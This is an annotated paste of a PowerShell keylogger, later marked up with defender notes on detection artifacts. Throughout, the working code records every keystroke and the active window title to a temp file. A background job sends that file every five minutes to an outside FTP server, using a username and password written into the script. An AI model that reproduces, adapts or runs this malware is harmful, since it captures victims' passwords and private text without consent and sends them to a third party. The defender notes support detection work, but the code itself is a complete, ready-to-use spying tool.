
Powershell Keylogger

a guest
Oct 10th, 2016
  1. <#
  2.  
  3. PowerShell keystroke logger
  4.  
  5. Pasted together by
  6. |-TheDoctor-|
  7.  
  8. #>
  9. function KeyLog {
      # KeyLog: polls the keyboard through user32.dll and, for each key press that
      # translates to a character, appends one line to "$env:temp\key.log" holding the
      # foreground window title, the character / special-key tags and a timestamp.
      # Takes no parameters and never returns (the body is a while ($true) loop).
      #
      # NOTE(defender): the script text carries the API names GetAsyncKeyState,
      # GetKeyboardState, MapVirtualKey, ToUnicode and GetForegroundWindow next to
      # Add-Type. PowerShell script block logging (event ID 4104) records that text,
      # and AMSI-integrated products see it as well.
  10.  
  11.     # MapVirtualKeyMapTypes
      # Of the five map-type constants declared here, only $MAPVK_VSC_TO_VK_EX is read
      # again later in this function.
  12.     # <summary>
  13.     # uCode is a virtual-key code and is translated into a scan code.
  14.     # If it is a virtual-key code that does not distinguish between left- and
  15.     # right-hand keys, the left-hand scan code is returned.
  16.     # If there is no translation, the function returns 0.
  17.     # </summary>
  18.     $MAPVK_VK_TO_VSC = 0x00
  19.  
  20.     # <summary>
  21.     # uCode is a scan code and is translated into a virtual-key code that
  22.     # does not distinguish between left- and right-hand keys. If there is no
  23.     # translation, the function returns 0.
  24.     # </summary>
  25.     $MAPVK_VSC_TO_VK = 0x01
  26.  
  27.     # <summary>
  28.     # uCode is a virtual-key code and is translated into an unshifted
  29.     # character value in the low-order word of the return value. Dead keys (diacritics)
  30.     # are indicated by setting the top bit of the return value. If there is no
  31.     # translation, the function returns 0.
  32.     # </summary>
  33.     $MAPVK_VK_TO_CHAR = 0x02
  34.  
  35.     # <summary>
  36.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
  37.     # virtual-key code that distinguishes between left- and right-hand keys. If
  38.     # there is no translation, the function returns 0.
  39.     # </summary>
  40.     $MAPVK_VSC_TO_VK_EX = 0x03
  41.  
  42.     # <summary>
  43.     # Not currently documented
  44.     # </summary>
  45.     $MAPVK_VK_TO_VSC_EX = 0x04
  46.  
      # C# P/Invoke declarations (single-quoted here-strings) for the five user32.dll
      # functions this function calls.
  47.     $virtualkc_sig = @'
  48. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  49. public static extern short GetAsyncKeyState(int virtualKeyCode);
  50. '@
  51.  
  52.     $kbstate_sig = @'
  53. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  54. public static extern int GetKeyboardState(byte[] keystate);
  55. '@
  56.  
  57.     $mapchar_sig = @'
  58. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  59. public static extern int MapVirtualKey(uint uCode, int uMapType);
  60. '@
  61.  
  62.     $tounicode_sig = @'
  63. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  64. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  65. '@
  66.  
  67.     $foreground_sig = @'
  68. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  69. public static extern IntPtr GetForegroundWindow();
  70. '@
  71.  
      # Each declaration is compiled into its own type in the Win32Functions namespace;
      # -passThru returns the type object so the static method can be called with '::'.
      # NOTE(defender): in Windows PowerShell, Add-Type on C# source usually shows up as
      # csc.exe started by powershell.exe plus short-lived files under the temp
      # directory - confirm against your own process telemetry.
  72.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  73.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  74.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  75.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  76.     $getForeground = Add-Type -MemberDefinition $foreground_sig -name "Win32MyGetForeground" -namespace Win32Functions -passThru
  77.  
      # Poll loop: sleep 40 ms, then query every virtual-key code from 1 to 254.
  78.     while ($true) {
  79.         Start-Sleep -Milliseconds 40
  80.         $gotit = ""
  81.  
  82.         for ($char = 1; $char -le 254; $char++) {
  83.             $vkey = $char
  84.             $gotit = $getKeyState::GetAsyncKeyState($vkey)
  85.  
              # -32767 is 0x8001 read as a signed 16-bit value: per the GetAsyncKeyState
              # documentation, high bit = key currently down, low bit = pressed since the
              # previous call.
  86.             if ($gotit -eq -32767) {
  87.  
                  # State of the non-printing keys that get a textual tag in the log line.
  88.                 $EnterKey = $getKeyState::GetAsyncKeyState(13)
  89.                 $TabKey = $getKeyState::GetAsyncKeyState(9)
  90.                 $DeleteKey = $getKeyState::GetAsyncKeyState(46)
  91.                 $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
  92.                 $LeftArrow = $getKeyState::GetAsyncKeyState(37)
  93.                 $UpArrow = $getKeyState::GetAsyncKeyState(38)
  94.                 $RightArrow = $getKeyState::GetAsyncKeyState(39)
  95.                 $DownArrow = $getKeyState::GetAsyncKeyState(40)
  96.  
                  # $caps_lock is assigned here and not read again in this function.
  97.                 $caps_lock = [console]::CapsLock
  98.  
  99.                 $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  100.  
                  # 256-byte buffer filled by GetKeyboardState and passed on to ToUnicode;
                  # the call's return value ($checkkbstate) is not read again.
  101.                 $kbstate = New-Object Byte[] 256
  102.                 $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  103.  
                  # Resolve the foreground window handle to a title by scanning the
                  # process list for a matching MainWindowHandle.
  104.                 $TopWindow = $getForeground::GetForegroundWindow()
  105.                 $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
  106.  
                  # Log line layout: "<window title>" TAB TAB TAB <char and tags> 5xTAB <timestamp>
  107.                 $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
  108.  
  109.                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
  110.                 $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  111.  
  112.                 $LogOutput += $mychar.ToString();
  113.                
  114.                 if ($EnterKey)     {$LogOutput += '[ENTER]'}
  115.                 if ($TabKey)       {$LogOutput += '[Tab]'}
  116.                 if ($DeleteKey)    {$LogOutput += '[Delete]'}
  117.                 if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
  118.                 if ($LeftArrow)    {$LogOutput += '[Left Arrow]'}
  119.                 if ($RightArrow)   {$LogOutput += '[Right Arrow]'}
  120.                 if ($UpArrow)      {$LogOutput += '[Up Arrow]'}
  121.                 if ($DownArrow)    {$LogOutput += '[Down Arrow]'}
  122.  
  123.                 $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
  124.                 $LogOutput += "`t`t`t`t`t" + $TimeStamp
  125.                
                  # The line is written only when ToUnicode reported at least one character.
                  # NOTE(defender): key.log in the user's temp directory is a host artifact;
                  # this script only appends to it and never truncates or deletes it, so the
                  # file keeps the full capture history for triage.
  126.                 if ($unicode_res -gt 0) {
  127.                     $logfile = "$env:temp\key.log"
  128.                     $LogOutput | Out-File -FilePath $logfile -Append
  129.                 }
  130.             }
  131.         }
  132.     }
  133. }
  134.  
  135. Start-Job {
      # Background job: every $SleepTime seconds (300), upload the whole local log file
      # to the FTP URL in $RemoteFile with the account hard-coded in the config below.
      # NOTE(defender): Start-Job normally runs its script block in a separate child
      # PowerShell process - confirm in process telemetry. The host, path and account in
      # this config block are indicators taken directly from the paste. Because the URL
      # is plain ftp://, the login and the uploaded content cross the network unencrypted
      # and are visible to network inspection.
  136.  
  137.     # Config
  138.     $Username = "russenzeug"
  139.     $Password = "w0dk4f0rth34rmy"
  140.     $LocalFile = "$env:temp\key.log"
  141.     $RemoteFile = "ftp://russenzeug.bplaced.net/Logs/Log.txt"
  142.     $SleepTime = 300
  143.  
  144.     while (1 -eq 1)
  145.     {
  146.         # Sleep for specified time
  147.         Start-Sleep -Seconds $SleepTime
  148.  
  149.         # Create FTP Request Object
  150.         $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
  151.         $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
  152.         $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
  153.         $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
  154.         $FTPRequest.UseBinary = $true
  155.         $FTPRequest.UsePassive = $true
  156.  
  157.         # Read the File for Upload
          # 'gc -en byte' is Get-Content -Encoding Byte: the entire file is read as a byte
          # array, so every cycle sends the complete log to the same remote path.
  158.         $FileContent = gc -en byte $LocalFile
  159.         $FTPRequest.ContentLength = $FileContent.Length
  160.  
  161.         # Get Stream Request by bytes
  162.         $Run = $FTPRequest.GetRequestStream()
  163.         $Run.Write($FileContent, 0, $FileContent.Length)
  164.  
  165.         # Cleanup
  166.         $Run.Close()
  167.         $Run.Dispose()
  168.     }
  169. }
  170.  
  # Runs the capture loop in the current session. KeyLog never returns, so nothing after
  # this line would execute; the upload job was already started above.
  171. KeyLog